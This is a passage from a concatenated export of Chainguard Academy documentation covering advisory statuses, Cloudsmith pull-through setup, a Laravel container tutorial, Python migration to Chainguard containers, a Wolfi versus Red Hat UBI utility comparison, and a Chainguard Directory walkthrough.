vulnerability is now “Fixed”. Chainguard may even proactively bump a vulnerable dependency to its newer, patched version before upstream projects have done so themselves. Or, patches issued outside of the upstream repository may be applied to remediate the vulnerability when a new package version is not yet available. Note that an end user would need to pull the new version of the container image with the updated fix for the CVE as older versions of the image would still be vulnerable. In some cases, a fix for the CVE may not yet be available. A package will be marked as having the “Pending upstream fix” status in this situation. Once an upstream fix is released, then it will be applied to the package and the advisory status updated to “Fixed”. Sometimes, a vulnerability may be present in a piece of software, but remediation is not planned. This could be because the package is no longer supported, such as in the case of an outdated package version or because the software is reaching the end of its life. If this is the case, then the security advisory status will be marked as “Fix not planned”. Rarely, a vulnerability is found in a package but there is no current status update on whether it can be remediated, or if plans exist to remediate it. In these few situations, the package is simply marked as being “Affected” by the vulnerability. This status is likely to be updated soon as the next steps towards remediation are established. Summary of Advisory Statuses Status Description Metadata Under investigation A vulnerability has been detected for the package and is awaiting further investigation to determine its impact. detection Affected A vulnerability finding has been determined to be present and affect the package. true-positive-determination Not affected The vulnerability was determined to not impact the package, making it a false positive finding. false-positive-determination Pending upstream fix Remediating the vulnerability is not possible until an upstream fix is made available. pending-upstream-fix Fixed A patch has been applied to the affected package and the vulnerability is no longer present. fixed Fix not planned There are no plans to address the vulnerability in the package at this time. fix-not-planned Further Reading Chainguard’s Security Advisory feed is a helpful tool to have at hand when scanning your containers for the presence of vulnerabilities. Though you won’t need it often thanks to the low CVE counts of our container images, it is a useful reference when working with your scans, giving you insight into how you can approach and fix any vulnerabilities which pop up. For more information on how to use Chainguard’s Security Advisories page to inform your vulnerability remediation, consider reading our article on How to Use Chainguard Security Advisories. If you are using Chainguard Containers at your organization or want to learn more about advisories for enterprise container images, please contact us. --- ### How to Set Up Pull Through from Chainguard's Registry to Cloudsmith URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/cloudsmith-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers Organizations often have their own internal software repositories and registries integrated into their systems. This guide explains how to set up the Cloudsmith artifact repository to ingest Chainguard Containers by acting as a pull-through cache. This tutorial outlines how to set up a remote repository with Cloudsmith. It will walk you through how to set up a Cloudsmith repository you can use as a pull through cache for Chainguard’s public Starter containers or for Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Docker installed on your local machine. Follow the official installation instructions to set this up. Administrative privileges over a Cloudsmith project. You can set up an account by visiting the Cloudsmith website. If you plan to set up a Cloudsmith repository to serve as a pull through cache for Production container images, then you will also need to have privileges to create a pull token from Chainguard. Additionally, you’ll need chainctl installed to create the pull token. If you haven’t already installed this, follow the installation guide. Setting up Cloudsmith as a Pull Through for Starter Containers Chainguard’s Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Cloudsmith through which you can pull Starter container images, log in to the Cloudsmith App. Once there, navigate to the Repositories tab and and click the + Create Repository button. A modal window will appear where you can enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard-public. Storage Region — Here, select the region closest to your location. Repository Type — This setting determines how the repository can be accessed. You can select Public, Private, or Open-Source. Following that, you will need to set an upstream proxy for this repository. This is what will let Cloudsmith know where to pull container images from. In the lower left-hand navigation menu, select Upstream Proxying. From there, click the ➕ Create Upstream button and select Docker as the upstream source. This will open a modal window where you can enter the details for the upstream source: This window has a few fields for which you need to enter values. The Name field can include any name you’d like for the upstream source, but it can be helpful to choose something descriptive. In our example the name is “Chainguard Public Upstream.” Likewise, you can choose whatever Priority value you prefer. This dictates the order in which requests are resolved, with 1 being resolved first, 2 second, and so on. The most important field in this window is the Upstream URL value. In order to use Cloudsmith as a pull through cache for Starter images, this must be set to https://cgr.dev/chainguard. Lastly, be sure that the Mode is set to Cache and Proxy and the Verify SSL Certificates option is selected. Then, click the Create Docker Upstream button. If you entered all the details correctly, then the upstream proxy will be created successfully and you can test pulling a Starter container image through Cloudsmith. Testing pull through of a Starter container image Before testing whether you can pull a Starter container through Cloudsmith, you’ll need to log in to the Cloudsmith registry with docker: docker login docker.cloudsmith.io This command will prompt you to enter your Cloudsmith username and password. Your username appears in the top-right corner of the Cloudsmith web app. If you click on this, a drop-down menu will appear. Select API Settings; on the resulting page you’ll find a field named API Key containing a 40-character string. You can use this API key to access Cloudsmith programmatically or, as in the case of this example, use it as a password in a docker login command. After running the command, you will be able to pull a Starter container through your new Cloudsmith repository. The following example pulls the nginx container image: docker pull docker.cloudsmith.io/<cloudsmith-organization>/<cloudsmith-repository>/nginx:latest Be sure to replace <cloudsmith-organization> and <cloudsmith-repository> with the names of your Cloudsmith organization and repository, respectively. If everything worked correctly, the image will appear in your repository: If you run into issues pulling images like this, ensure that your docker pull command specifies the correct Cloudsmith organization and repository. Setting up Cloudsmith as a Pull Through for Production Container Images Production Chainguard Containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up a Cloudsmith repository that you can use as a pull through cache for Production containers is similar to the one outlined previously for Starter containers, but with a few extra steps. You can create a new Cloudsmith repository or use the same repository you used as a pull through cache for Starter containers. Next, you’ll need to create a pull token for your organization’s registry through Chainguard. Pull tokens are longer-lived tokens that can be used to pull Containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Cloudsmith. Log in with chainctl: chainctl auth login Then configure a pull token: chainctl auth configure-docker --pull-token By default, this will create a pull token that lasts for 30 days. You can adjust this by appending the command with the --ttl flag (for example, --ttl=24h). This command will prompt you to select an organization. Be sure to select the organization whose Production Containers you want to pull through your Cloudsmith repository. This will create a pull token and print a docker login command that can be run in a CI environment to log in with the token. This command includes both --username and --password arguments. You don’t need to run this docker login command, but you will need the username and password values in a moment so note them down. Following that, you’ll need to create another upstream source. Return to the Cloudsmith web app and navigate to the Upstream Proxying page. Click the ➕ Create Upstream button and select Docker as the upstream source. Again, set a Name and Priority level for this source and ensure that the Mode is set to Cache and Proxy. When pulling from a private registry through Chainguard, the Upstream URL must be set to https://cgr.dev/; any other URL here will cause an error. Lastly, you need to add the username and password you received when you generated the pull token to the upstream source. To do this, expand the Authentication section and under Method select Username and Password. Then enter the username and password you noted down earlier in their respective fields. Finally, click the Create Docker Upstream button. With that, you’re ready to test a Chainguard Production Container through Cloudsmith. Testing pull through of a Chainguard Production Container: As with testing pull through of a Starter container image, you’ll first need to authenticate to Cloudsmith: docker login docker.cloudsmith.io After running the command, you will be able to pull any Production containers that your organization has access to through Cloudsmith. To do so, you would run a command with syntax like the following: docker pull docker.cloudsmith.io/<cloudsmith-organization>/<cloudsmith-repository>/<chainguard-registry>/IMAGE As with the docker pull command used in the previous section, you will need to change the <cloudsmith-organization> and <cloudsmith-repository> values to reflect your own Cloudsmith setup. Additionally, be sure to change <chainguard-registry> to the name of your organization’s Chainguard registry. As an example, the following command will pull the python:3.9-dev image from a Chainguard registry named chainguard.edu and through a Cloudsmith repository named chainguard-private owned by a Cloudsmith organization named chainguard-example: docker pull docker.cloudsmith.io/chainguard-example/chainguard-private/chainguard.edu/python:3.9-dev Once this command is completed you will find the Production container you pulled in your Cloudsmith repository. If you run into issues pulling images like this, be sure that your docker pull command specifies the correct Cloudsmith organization and repository as well as the correct Chainguard registry. Debugging Pull Through from Chainguard’s registry to Cloudsmith If you run into issues when trying to pull Containers from Chainguard’s registry to Cloudsmith, please make sure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Cloudsmith repository, ensure that the URL field is set correctly. For Starter container images, this should be https://cgr.dev/chainguard; for Production containers this should be https://cgr.dev/. This field must not contain any additional components. You can troubleshoot by running docker login from another node (using the Cloudsmith pull token credentials) and try pulling an image from cgr.dev/chainguard/<image name> or cgr.dev/<example.com>/<image name>, using your own organization’s registry name in place of <example.com>. It could be that your Cloudsmith repository was misconfigured. In this case, create and configure a new Cloudsmith repository to test with. Learn More If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Cloudsmith, we encourage you to refer to the official documentation. --- ### Getting Started with the Laravel Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/laravel/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Laravel Chainguard Container is a container image that has the tooling necessary to develop, build, and execute Laravel applications, including required extensions. Laravel is a full-stack PHP framework that enables developers to build complex applications using modern tools and techniques that help streamline the development process. In this guide, we’ll set up a demo and demonstrate how you can use Chainguard Containers to develop, build, and run Laravel applications. This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. 1. Setting Up a Demo Application We’ll start by getting the demo application ready. The demo is called OctoFacts, and it shows a random fact about Octopuses alongside a random Octopus image each time the page is reloaded. Quotes are loaded from a .txt file into the database through a database migration. By default, the application uses an SQLite database. This allows us to test the application with the built-in web server provided by the artisan serve command, without having to set up a full PHP development environment first. In the next step, we’ll configure a multi-node environment using Docker Compose to demonstrate a typical LEMP (Linux, (E)Nginx, MariaDB, and PHP) environment using Chainguard Containers. Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Locate the octo-facts demo and cd into its directory: cd edu-images-demos/php/octo-facts The demo includes a .env.dev file with the app’s configuration for development. You should create a copy of this file and save it as .env, so that the application can load default settings: cp .env.dev .env You can now use the builder Laravel container image to install dependencies via Composer. Notice that we’re using the laravel system user in order to be able to write to the shared folder without issues: docker run --rm -v ${PWD}:/app --entrypoint composer --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ install You can now run the database migrations and seed the database with sample data. This will populate a .sqlite database with facts obtained from the octofacts.txt file in the root of the application. docker run --rm -v ${PWD}:/app --entrypoint php --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ /app/artisan migrate --seed Next, run npm install to install Node dependencies. You can use the node:latest-dev container image for that, but you’ll need to use the root container user in order to be able to write to the shared folder using this image: docker run --rm -v ${PWD}:/app --entrypoint npm --user root \ cgr.dev/chainguard/node:latest-dev \ install Then, fix permissions on node modules with: sudo chown -R ${USER} node_modules/ The next step is to build front end assets. You can use the npm run build command for that. Like with npm install, you’ll need to set the container user to root. docker run --rm -v ${PWD}:/app --entrypoint npm --user root \ cgr.dev/chainguard/node:latest-dev \ run build Fix permissions on the public folder: sudo chown -R ${USER} public/ The application is all set. Next, run the built-in web server with: docker run -p 8000:8000 --rm -it -v ${PWD}:/app \ --entrypoint /app/artisan --user laravel \ cgr.dev/chainguard/laravel:latest-dev serve --host=0.0.0.0 This command will create a port redirect that allows you to access the built-in web server running in the container. It uses a volume share for the application files, and sets the entrypoint to the artisan serve command. You should now be able to access the application from your browser at localhost:8000. You’ll get a page similar to this: 2. Creating a LEMP Environment with Docker Compose To demonstrate a full LEMP setup using Chainguard Containers, we’ll now set up a Docker Compose environment to serve the application via Nginx. This setup can be used as a more robust development environment that replicates a production setting based on secure container images. The following docker-compose.yaml file is already included in the root of the application folder: services:app:image:cgr.dev/chainguard/laravel:latest-devrestart:unless-stoppedworking_dir:/appvolumes:- .:/appnetworks:- wolfinginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:8080volumes:- .:/app- ./nginx.conf:/etc/nginx/nginx.confnetworks:- wolfimariadb:image:cgr.dev/chainguard/mariadbrestart:unless-stoppedenvironment:MARIADB_ALLOW_EMPTY_ROOT_PASSWORD:1MARIADB_USER:laravelMARIADB_PASSWORD:passwordMARIADB_DATABASE:octofactsports:- 3306:3306networks:- wolfinetworks:wolfi:driver:bridgeThis docker-compose.yaml file defines 3 services to run the application (app, nginx, mariadb), using volumes to share the application files within the container and a configuration file for the Nginx server, which we’ll showcase in a moment. Notice the database credentials within the mariadb service: these environment variables are used to set up the database. This is done automatically by the MariaDB container image entrypoint upon container initialization. We’ll use these credentials to configure the new database within Laravel’s .env file. Please note this Docker Compose setup is intended for local development only. For production environments, you should never keep sensitive data like database credentials in plain text. Check the Docker Compose Documentation for more information on how to handle sensitive data in Compose files. The following nginx.conf file is also included within the root of the application folder. This file is based on the recommended Nginx deployment configuration from official Laravel docs. pid /var/run/nginx.pid; events { worker_connections 1024; } http { server { listen 8080; root /app/public; add_header X-Frame-Options "SAMEORIGIN"; add_header X-Content-Type-Options "nosniff"; index index.php; charset utf-8; location / { include /etc/nginx/mime.types; try_files $uri $uri/ /index.php?$query_string; } location = /favicon.ico { access_log off; log_not_found off; } location = /robots.txt { access_log off; log_not_found off; } error_page 404 /index.php; location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass app:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; } location ~ /\.(?!well-known).* { deny all; } } } This file sets up the document root to app/public and configures Nginx to redirect .php requests to the container running PHP-FPM (app:9000). You can bring the environment up with: docker compose up This command will block your terminal and show live logs from each of the running services. With the MariaDB database up and running, you can now update Laravel’s main .env file to change the database connection from sqlite to mysql. Open the .env file in your editor of choice and locate the database settings. The DB_CONNECTION parameter is set to sqlite, you should change that to mysql and uncomment the remaining variables to reflect the settings from your docker-compose.yaml file. This is how the database section should look like when you’re finished editing: DB_CONNECTION=mysql DB_HOST=mariadb DB_PORT=3306 DB_DATABASE=octofacts DB_USERNAME=laravel DB_PASSWORD=password Save and close the file. If you reload the application on your browser now, you should get a database error, because the database is empty. You’ll need to re-run migrations and seed the database. To do that, you can run a docker exec command on the live container. First, look for the container running the app service and copy its name. docker compose ps NAME IMAGE COMMAND SERVICE CREATED STATUS PORTS octo-facts-app-1 cgr.dev/chainguard/laravel:latest-dev "/bin/s6-svscan /sv" app 11 seconds ago Up 10 seconds octo-facts-mariadb-1 cgr.dev/chainguard/mariadb "/usr/local/bin/dock…" mariadb 11 seconds ago Up 10 seconds 0.0.0.0:3306->3306/tcp, :::3306->3306/tcp octo-facts-nginx-1 cgr.dev/chainguard/nginx "/usr/sbin/nginx -c …" nginx 11 seconds ago Up 10 seconds 0.0.0.0:8000->8080/tcp, :::8000->8080/tcp Then, you can run migrations like this: docker exec octo-facts-app-1 php /app/artisan migrate --seed You can use the same method to execute other Artisan commands while the environment is up. After running migrations and seeding the database, you should be able to reload the app from your browser at localhost:8000 and get a new octopus fact. 3. Creating a Distroless Laravel Runtime for the Application So far, we have been using the laravel:latest-dev builder image to run the application in a development setting. For production workloads, the recommended approach for additional security is to create a distroless runtime for the application that will contain only what’s absolutely necessary for running the app on production. This is done by combining a build phase in a multi-stage Dockerfile. To demonstrate this approach, we’ll now build a distroless container image and test it using the Docker Compose setup exemplified in the previous section. The following Dockerfile is included within the root of the application: FROMcgr.dev/chainguard/laravel:latest-dev AS builderUSERrootRUN apk update && apk add nodejs npmCOPY . /appRUN cd /app && chown -R php.php /appUSERphpRUN composer install --no-progress --no-dev --prefer-distRUN npm install && npm run buildFROMcgr.dev/chainguard/laravel:latestCOPY --from=builder /app /appThis Dockerfile starts with a build stage that copies the application files to the container, installs Node and NPM, installs the application dependencies, and dumps front-end assets to the public folder. A second stage based on laravel:latest copies the application from the build stage to the final distroless image. It’s important to notice that we don’t run any database migrations here, because at build time the database might not be ready yet. In other production scenarios, you may be able to include the migration within the Dockerfile, as long as the database is already up and running. The file docker-compose-distroless.yaml included within the root of the application folder has a few changes compared to the previous docker-compose.yaml file. The app service now uses the octofacts image, which is built from the Dockerfile referenced above. The user: laravel directive is also removed so commands run as the default php user. This is how the app service looks like in the new file: app:image:octofactsbuild:context:.restart:unless-stoppedworking_dir:/appuser:laravelvolumes:- .:/appnetworks:- wolfi...If your environment is still running, you should stop it before proceeding. Hit CTRL+C and then run: docker compose down This will stop and remove all containers, networks, and volumes created by the previous docker-compose.yaml file. You can now bring the new environment up with: docker compose -f docker-compose-distroless.yaml up Once the environment is up and running, you can now run the database migrations with: docker exec octo-facts-app-1 php /app/artisan migrate --seed You should now be able to reload your browser and obtain a new octopus fact. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Laravel Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Migrating to Python Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-python/ Last Modified: May 2, 2024 Tags: Chainguard Containers, Product, Migration This guide is a high-level overview for migrating an existing containerized Python application to Chainguard Containers. Chainguard Containers are built on Wolfi, a distroless Linux distribution designed for security and a reduced attack surface. Chainguard Containers are smaller and have low to no CVE. Our Chainguard Containers for Python are built nightly for extra freshness, so they’re always up-to-date with the latest remediations. What is Distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi OS? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Because Chainguard Containers aim to be minimal, adapting your containerized application requires that you consider some additional factors that will be discussed below. Chainguard Containers for Python Overview We distribute two versions of our Python container image: a development image that includes shells such as ash/bash and package managers such as pip and a standard image that removes these tools for increased security. Our public standard images are tagged as latest, while our public development images are tagged as latest-dev. Differences from the Docker Official Image When migrating your Python application , keep in mind these differences between the Chainguard Container for Python and the official Docker image. The entrypoint for the Chainguard Container for Python is /usr/bin/python. When running either the latest or latest-dev versions of the image interactively, you’ll be working in the Python interpreter. When using CMD in your Dockerfiles, provided commands will be passed to python by default. If you change the path to include binaries from a virtual environment , you should manually set the entrypoint or your Dockerfile will continue to use the included system Python as the entrypoint and you will not have access to installed packages in the virtual environment. Chainguard Containers for Python run as the nonroot user by default. If you need elevated permissions, such as to add packages with apk, run the image as --user root. You should not use the root user in a production scenario. The /home and /home/nonroot directories are owned by the nonroot user. The python:latest Chainguard Container intended for production does not include a sh, ash, or bash. See the Debugging Distroless guide for advice on resolving issues without the use of these shells. The python:latest Chainguard Container does not contain package managers such as pip or apk. See the sections below for guidance on multi-stage builds (recommended)or building your own images on Wolfi (advanced usage). Chainguard Containers for Python aim to be lightweight, and you may find that specific packages or dependencies are not included by default. The image details reference provides specific information on packages, features, and default environment variables for the image. Migrating a Python Application When migrating most containerized Python applications, we recommend building a virtual environment with any needed Python packages using our provided development images, then copying over the virtual environment to our stripped-down standard image. Chainguard Academy hosts detailed instructions for a multi-stage build for a CLI-based Python script. The below Dockerfile provides an example of such a multi-stage build for a simple Flask application. You can view a version of this Dockerfile with included sample Flask application and requirements.txt in this repository, and the original unmigrated application in the v0 branch. A more complex setup with reverse proxy orchestrated with Docker Compose is provided in the next section. # syntax=docker/dockerfile:1FROMcgr.dev/chainguard/python:latest-dev AS devWORKDIR/flask-appRUN python -m venv venvENV PATH="/flask-app/venv/bin":$PATHCOPY requirements.txt requirements.txtRUN pip install -r requirements.txtFROMcgr.dev/chainguard/python:latestWORKDIR/flask-appCOPY app.py app.pyCOPY --from=dev /flask-app/venv /flask-app/venvENV PATH="/flask-app/venv/bin:$PATH"EXPOSE8000ENTRYPOINT ["python", "-m", "gunicorn", "-b", "0.0.0.0:8000", "app:app"]When running an application containerized with the above Dockerfile, the application should be visible on 0.0.0.0:8000. As you can see, the primary difference in this Flask application compared to the pre-migration application is the use of a multistage build. In the initial stage, we copy our requirements into the development version of the Python Chainguard Image, initialize a virtual environment, and install needed packages with pip. In the second stage, we copy the virtual environment from the development image, copy the application from the host, set exposed port metadata, and run the application with the Gunicorn WSGI server. By default, the entrypoint for the Python Chainguard Container is /usr/bin/python rather than bash. However, if you shadow the included system python with the virtual environment pythonon the path as we do above, you should set the entrypoint explicitly. Otherwise, you will not have access to the packages included in your virtual environment. We recommend that you pin dependencies to specific versions in your own application. The example Flask application script linked above also enables debug mode, which should be turned off in a production scenario. You may wish to include the following environmental variables in your Dockerfile. The first prevents the buffering of output, meaning that all messages printed to standard output are immediately printed rather than being held in a cache. The second prevents the creation of cached bytecode, which can marginally reduce image size. ENV PYTHONUNBUFFERED 1ENV PYTHONDONTWRITEBYTECODE 1Serving an Application with nginx and Docker Compose We provide an nginx Chainguard Container, also with low to no CVEs, that can be used as a secure and performant reverse proxy to serve your application. You can view an example orchestration of a Flask application and nginx using Chainguard Containers at the linked repository. The compose.yml file is provided as a reference below. services: flask-app: build: context: flask-app restart: always ports: - 8000:8000 networks: - backnet - frontnet nginx: build: nginx restart: always ports: - 80:80 depends_on: - flask-app networks: - frontnetnetworks: backnet: frontnet:The backnet and frontnet networks are provided in anticipation of other backend services such as a database container. View the sample repository branch for a full orchestration example with nginx configuration. Advanced Usage If your project image requires a set of packages that cannot be installed with pip using the multi-stage approach above, you can consider building your application on the Wolfi base image and installing additional Python and non-Python packages as APKs. Additional Resources You may wish to refer to the Python microservice example in the porting a sample application guide as an additional useful reference while migrating your application. Debugging distroless containers can be a challenge given their lack of interactive tools such as shells. If you’re having difficulty debugging issues with your multi-stage build, you may find the Debugging Distroless guide a useful resource. The following blog posts and videos may also assist with migrating your Python application: Blog Post: Securely Containerize a Python Application with Chainguard Containers Video: How to containerize a Python application with a multi-stage build using Chainguard Containers --- ### Red Hat UBI Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/red-hat-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Red Hat UBI base images have different binaries and scripts included in their respective busybox and coreutils packages. Note that Red Hat UBI images by default do not have a busybox package. The following table lists common tools and their corresponding package(s) in both Wolfi and Red Hat distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Red Hat. You can use the apk search command in Wolfi, or the yum search or dnf search commands in Red Hat to find out which package includes a tool. Utility Wolfi busybox Redhat-ubi busybox Wolfi coreutils Redhat-ubi coreutils [ ✅ ✅ ✅ [[ ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ arch ✅ ✅ arping ✅ ash ✅ awk ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ basename ✅ ✅ ✅ basenc ✅ bbconfig ✅ bc ✅ beep ✅ bunzip2 ✅ bzcat ✅ bzip2 ✅ cal ✅ cat ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ chmod ✅ ✅ ✅ chown ✅ ✅ ✅ chpasswd ✅ chroot ✅ ✅ ✅ chrt ✅ cksum ✅ ✅ ✅ clear ✅ cmp ✅ comm ✅ ✅ ✅ coreutils ✅ ✅ cp ✅ ✅ ✅ cpio ✅ cryptpw ✅ csplit ✅ ✅ cut ✅ ✅ ✅ date ✅ ✅ ✅ dc ✅ dd ✅ ✅ ✅ delgroup ✅ deluser ✅ df ✅ ✅ ✅ diff ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ dmesg ✅ dnsdomainname ✅ dos2unix ✅ du ✅ ✅ ✅ echo ✅ ✅ ✅ ed ✅ egrep ✅ env ✅ ✅ ✅ expand ✅ ✅ ✅ expr ✅ ✅ ✅ factor ✅ ✅ ✅ fallocate ✅ false ✅ ✅ ✅ fgrep ✅ find ✅ findfs ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ free ✅ fsync ✅ fuser ✅ getopt ✅ getty ✅ grep ✅ groups ✅ ✅ gunzip ✅ gzip ✅ hd ✅ head ✅ ✅ ✅ hexdump ✅ hostid ✅ ✅ ✅ hostname ✅ id ✅ ✅ ✅ inotifyd ✅ install ✅ ✅ ✅ ionice ✅ iostat ✅ ipcrm ✅ ipcs ✅ join ✅ ✅ kill ✅ killall ✅ killall5 ✅ less ✅ link ✅ ✅ ✅ linux32 ✅ linux64 ✅ ln ✅ ✅ ✅ logger ✅ login ✅ logname ✅ ✅ ls ✅ ✅ ✅ lsattr ✅ lsof ✅ lzcat ✅ lzma ✅ lzop ✅ lzopcat ✅ md5sum ✅ ✅ ✅ microcom ✅ mkdir ✅ ✅ ✅ mkfifo ✅ ✅ ✅ mknod ✅ ✅ ✅ mkpasswd ✅ mktemp ✅ ✅ ✅ more ✅ mountpoint ✅ mpstat ✅ mv ✅ ✅ ✅ netstat ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ nproc ✅ ✅ ✅ nsenter ✅ numfmt ✅ ✅ od ✅ ✅ ✅ passwd ✅ paste ✅ ✅ ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ping ✅ ping6 ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ pkill ✅ pmap ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ps ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ pwdx ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ realpath ✅ ✅ ✅ remove-shell ✅ renice ✅ reset ✅ resize ✅ rev ✅ rm ✅ ✅ ✅ rmdir ✅ ✅ ✅ run-parts ✅ runcon ✅ ✅ sed ✅ seq ✅ ✅ ✅ setpriv ✅ setserial ✅ setsid ✅ sh ✅ sha1sum ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ sha512sum ✅ ✅ ✅ shred ✅ ✅ ✅ shuf ✅ ✅ ✅ sleep ✅ ✅ ✅ sort ✅ ✅ ✅ split ✅ ✅ ✅ stat ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ stty ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ sync ✅ ✅ ✅ sysctl ✅ tac ✅ ✅ ✅ tail ✅ ✅ ✅ tar ✅ tee ✅ ✅ ✅ test ✅ ✅ ✅ time ✅ timeout ✅ ✅ ✅ top ✅ touch ✅ ✅ ✅ tr ✅ ✅ ✅ traceroute ✅ traceroute6 ✅ tree ✅ true ✅ ✅ ✅ truncate ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ttysize ✅ tunctl ✅ uname ✅ ✅ ✅ unexpand ✅ ✅ ✅ uniq ✅ ✅ ✅ unix2dos ✅ unlink ✅ ✅ ✅ unlzma ✅ unlzop ✅ unxz ✅ unzip ✅ uptime ✅ users ✅ ✅ usleep ✅ uudecode ✅ uuencode ✅ vconfig ✅ vdir ✅ ✅ vi ✅ vlock ✅ watch ✅ wc ✅ ✅ ✅ which ✅ who ✅ ✅ ✅ whoami ✅ ✅ ✅ xargs ✅ xxd ✅ xzcat ✅ yes ✅ ✅ ✅ zcat ✅ --- ### Using the Chainguard Directory and Console URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/images-directory/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product There are hundreds of Chainguard Containers available for use. To help users explore and better understand all of these container images, we’ve developed the Chainguard Directory. This guide serves as a walkthrough of the browsing experience for Chainguard Containers in the Directory and Console, including how to access it and get the most out of its features. Accessing the Chainguard Directory and Console This guide is primarily framed around the Chainguard Directory and the Chainguard Console. The Console is accessible to anyone, including users who aren’t Chainguard customers. To access the Console, you’ll first need to create an account and sign in. If you would like to open the console with your Organization already selected, you can use (and bookmark) a link like this, replacing ORGANIZATION with your organization’s name: https://console.chainguard.dev/auth/login?org=ORGANIZATION If you’re not ready to create a Chainguard account, you can follow along with the public Chainguard Directory. As of this writing, there are some differences between the two websites, but both should provide a similar Chainguard Containers browsing experience. Browse Chainguard Containers After signing in to the Chainguard Console, your browser will take you to a landing page like the following. Click Browse Containers in the left-hand navigation. There, you’ll be presented with a list of all of Chainguard’s available images. Note: If you are part of an organization, you may have access to resources in the Organization images tab. If so, you explore the images there as you would with the Browse Containers tab. The table view above has five columns: Name: the name of each given container image. Latest version: the latest available version of the image. Note that this column’s value could be a version number or it may read latest. In the former case, this means that the latest version Chainguard offers is a different, later version than the one the publicly available image tagged with :latest. URI: the registry URI you can use in a docker pull command to download the container image. Production containers, which are not publicly available, will instead have a message reading “Contact us for access to this image” with a link to Chainguard’s contact form. Available versions: a list of what versions are available for this container image. Each container image will have a latest version, and most will also have a latest-dev version. Updated: how long it’s been since the container image was last updated. Note that container images listed in the Organization container images tab have an extra column labeled Entitlement. This column specifies what resources an organization has purchased and has access to. This column can show one of two possible values: Active, meaning that your organization is able to download and use the container image, or Expired, meaning that your organization had access to the container image in the past but not anymore. You can click on any of these column names to sort the list of container images in ascending or descending order based on the values in these columns. Above the table is a search box you can use to find specific container images by their name or latest version number. To the right of this box is a drop-down menu labeled Category. You can use this to filter the images listed based on what category they belong to. Container image information Next, let’s inspect an individual container image. Click on any container image you’d like. This example shows the page for the argocd image. Each container image page has eight tabs that provide information about various facets of the given image. Versions tab The default page for each image is the Versions tab which contains information about the versions available for each image. This contains a table with columns: Version: this column lists each version tag available for the container image. Pull URL: the URL you can use to download each version of the image. As with the main Containers Directory page, Production containers will have a message reading “Contact us for access to this image” with a link to Chainguard’s contact form. Size: the size of the image, in megabytes. Last changed: when each version of the image was last updated. Above the table is a search box which you can use to filter the different versions available for the image. There is also a Variants drop-down menu you can use to filter for all images or only -dev variants. Overview tab The Overview tab contains the container image’s README. Typically, this will include instructions on how to download the container image, any relevant compatibility notes, and instructions on how to get started with using the image. Provenance tab All Chainguard Containers contain verifiable signatures and high-quality software bills of materials (SBOMs). These features allow you to confirm the origin of each image and provide you with a detailed list of everything included in the container image. The 